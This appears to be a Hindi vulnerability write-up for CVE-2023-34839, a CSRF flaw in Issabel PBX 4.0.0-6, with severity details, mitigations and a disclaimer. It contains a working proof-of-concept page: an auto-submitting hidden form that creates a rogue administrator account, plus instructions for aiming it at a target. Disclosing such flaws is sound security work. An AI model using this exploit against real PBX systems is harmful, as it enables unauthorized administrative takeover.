
CVE-2023-34839 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक Cross-Site Request Forgery (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफॉर्म है।
CVE-2023-34839 एक क्रॉस-साइट अनुरोध जालसाजी (CSRF) भेद्यता है जो Issabel PBX संस्करण 4.0.0-6 में खोजी गई है, जो व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफ़ॉर्म है। यह भेद्यता यूज़र-प्रबंधन एंडपॉइंट में मौजूद है और एक बिना प्रमाणित (unauthenticated) दूरस्थ हमलावर को, वर्तमान में प्रमाणित व्यवस्थापक को एक विशेष रूप से तैयार किए गए वेबपेज पर जाने के लिए धोखा देकर, चुपचाप एक नया व्यवस्थापक खाता बनाने की अनुमति देती है।
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2023-34839 |
| दिनांक | 23 जून 2023 |
| शोधकर्ता | Sahil Ojha |
| विक्रेता | Issabel |
| उत्पाद | Issabel PBX |
| संस्करण | 4.0.0-6 |
| परीक्षण किया गया | Windows |
Issabel PBX 4.0.0-6 यूज़र निर्माण एंडपॉइंट पर CSRF सुरक्षा (जैसे सिंक्रोनाइज़र टोकन, SameSite कुकी विशेषताएँ, या Origin / Referer हेडर सत्यापन) लागू नहीं करता है:
POST /index.php?menu=userlist&action=new
चूँकि एप्लिकेशन प्रमाणीकरण के लिए केवल सत्र कुकीज़ (session cookies) पर निर्भर करता है और स्थिति-परिवर्तन (state-changing) अनुरोधों का कोई सत्यापन नहीं करता, किसी भी ओरिजिन से प्रस्तुत एक जाली POST अनुरोध को लॉग-इन व्यवस्थापक सत्र के पूर्ण विशेषाधिकारों के साथ स्वीकार और संसाधित कर लिया जाएगा।
मूल कारण: स्थिति-परिवर्तन वाले प्रशासनिक एंडपॉइंट्स पर एंटी-CSRF टोकन सत्यापन का अभाव।
भेद्यता वर्ग: CWE-352 — क्रॉस-साइट अनुरोध जालसाजी (CSRF)
| सॉफ़्टवेयर | संस्करण | स्थिति |
|---|---|---|
| Issabel PBX | 4.0.0-6 | भेद्य ✔ |
| मीट्रिक | मान |
|---|---|
| CVSS v3.1 वेक्टर | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| आधार स्कोर | 8.8 (उच्च) |
| हमला वेक्टर | नेटवर्क |
| हमले की जटिलता | कम |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | आवश्यक (व्यवस्थापक की विज़िट) |
| दायरा | अपरिवर्तित |
| गोपनीयता | उच्च |
| अखंडता | उच्च |
| उपलब्धता | उच्च |
एक हमलावर निम्नलिखित उच्च-स्तरीय चरणों के माध्यम से इस भेद्यता का शोषण कर सकता है:
पीड़ित की ओर से एक बार के पेज विज़िट के अलावा किसी अन्य सहभागिता की आवश्यकता नहीं है।
⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।
लक्षित Issabel PBX इंस्टेंस के होस्टनाम या IP पते सेlocalhostको बदलें।
यदि आप स्व-हस्ताक्षरित प्रमाणपत्र वालेhttps://एंडपॉइंट के विरुद्ध परीक्षण कर रहे हैं, तो आपको पहले उसी ब्राउज़र में लक्षित URL पर जाकर प्रमाणपत्र चेतावनी स्वीकार करनी होगी; अन्यथा ब्राउज़र क्रॉस-ओरिजिन फ़ॉर्म सबमिशन को अवरुद्ध कर देगा।
<html>
<!-- CSRF Exploit — CVE-2023-34839 -->
<body>
<form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="name" value="CSRF" />
<input type="hidden" name="description" value="CSRF Test Account" />
<input type="hidden" name="password1" value="Test@123" />
<input type="hidden" name="password2" value="Test@123" />
<input type="hidden" name="group" value="1" /> <!-- 1 = Administrator -->
<input type="hidden" name="extension" value="" />
<input type="hidden" name="webmailuser" value="" />
<input type="hidden" name="webmaildomain" value="" />
<input type="hidden" name="webmailpassword1" value="" />
<input type="hidden" name="id_user" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
एक्सप्लॉइट फ़ाइल इस रिपॉज़िटरी में भी उपलब्ध है: CSRF Exploit.html
Issabel PBX वेब इंटरफ़ेस पर जाएँ और व्यवस्थापक क्रेडेंशियल्स से लॉग इन करें।

ऊपर दिए गए PoC HTML कोड को कॉपी करें और इसे एक .html फ़ाइल के रूप में सहेजें, तथा localhost को लक्षित Issabel इंस्टेंस के वास्तविक होस्टनाम या IP पते से बदलें।
एक्सप्लॉइट एप्लिकेशन में एक नया यूज़र निर्माण अनुरोध चुपचाप POST करने के लिए छिपे हुए फ़ॉर्म फ़ील्ड्स का उपयोग करता है। जब पेज लोड होता है, तो एम्बेडेड जावास्क्रिप्ट बिना किसी दृश्य उपयोगकर्ता क्रिया के तुरंत फ़ॉर्म सबमिट कर देती है।

सहेजी गई HTML फ़ाइल को उसी ब्राउज़र में (एक नए टैब में) खोलें जबकि व्यवस्थापक सत्र अभी भी सक्रिय हो। पेज लोड होते ही फ़ॉर्म स्वतः सबमिट हो जाएगा।
Issabel PBX यूज़र प्रबंधन पैनल पर वापस जाएँ। एक नया यूज़र खाता (इस PoC में, नाम CSRF) पूर्ण व्यवस्थापक विशेषाधिकारों के साथ बना दिया गया होगा — एक्सप्लॉइट पेज खोलने के अलावा किसी अतिरिक्त सहभागिता के बिना।

CVE-2023-34839 का सफल शोषण एक हमलावर को निम्नलिखित की अनुमति देता है:
चूँकि दुष्ट खाता पीड़ित के सत्र समाप्त होने के बाद भी बना रहता है, हमलावर को तब तक अनिश्चितकालीन पहुँच प्राप्त रहती है जब तक कि खाते का पता लगाकर उसे हटा न दिया जाए।
Issabel PBX व्यवस्थापकों और डेवलपर्स को निम्नलिखित शमन उपाय लागू करने चाहिए:
एंटी-CSRF टोकन लागू करें: प्रत्येक स्थिति-परिवर्तन फ़ॉर्म के लिए एक अद्वितीय, अप्रत्याशित, सत्र-बद्ध टोकन उत्पन्न करें। किसी भी POST अनुरोध को संसाधित करने से पहले टोकन को सर्वर-साइड पर सत्यापित करें।
सत्र कुकीज़ पर SameSite=Strict या SameSite=Lax लागू करें: यह ब्राउज़रों को क्रॉस-साइट अनुरोधों पर कुकीज़ नहीं भेजने का निर्देश देता है, जिससे आधुनिक ब्राउज़रों में क्लासिक CSRF हमले प्रभावी रूप से रुक जाते हैं।
Origin और Referer हेडर को सत्यापित करें: उन अनुरोधों को अस्वीकार करें जिनका Origin या Referer हेडर अपेक्षित एप्लिकेशन डोमेन से मेल नहीं खाता।
संवेदनशील कार्यों के लिए पुनः प्रमाणीकरण आवश्यक करें: नए व्यवस्थापक-स्तरीय खातों के निर्माण की अनुमति देने से पहले व्यवस्थापक से उनका वर्तमान पासवर्ड माँगें।
नवीनतम सुरक्षा पैच लागू करें: इस CVE को संबोधित करने वाले पैच के लिए Issabel रिलीज़ पेज और आधिकारिक रिपॉज़िटरी की निगरानी करें।
यह रिपॉज़िटरी केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा अनुसंधान के लिए है। यहाँ दी गई जानकारी और प्रूफ-ऑफ-कॉन्सेप्ट कोड का उपयोग केवल उन सिस्टमों के विरुद्ध किया जाना चाहिए जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। उन सिस्टमों के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं, अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है। लेखक इस रिपॉज़िटरी में निहित जानकारी के किसी भी दुरुपयोग के लिए कोई दायित्व नहीं मानता है।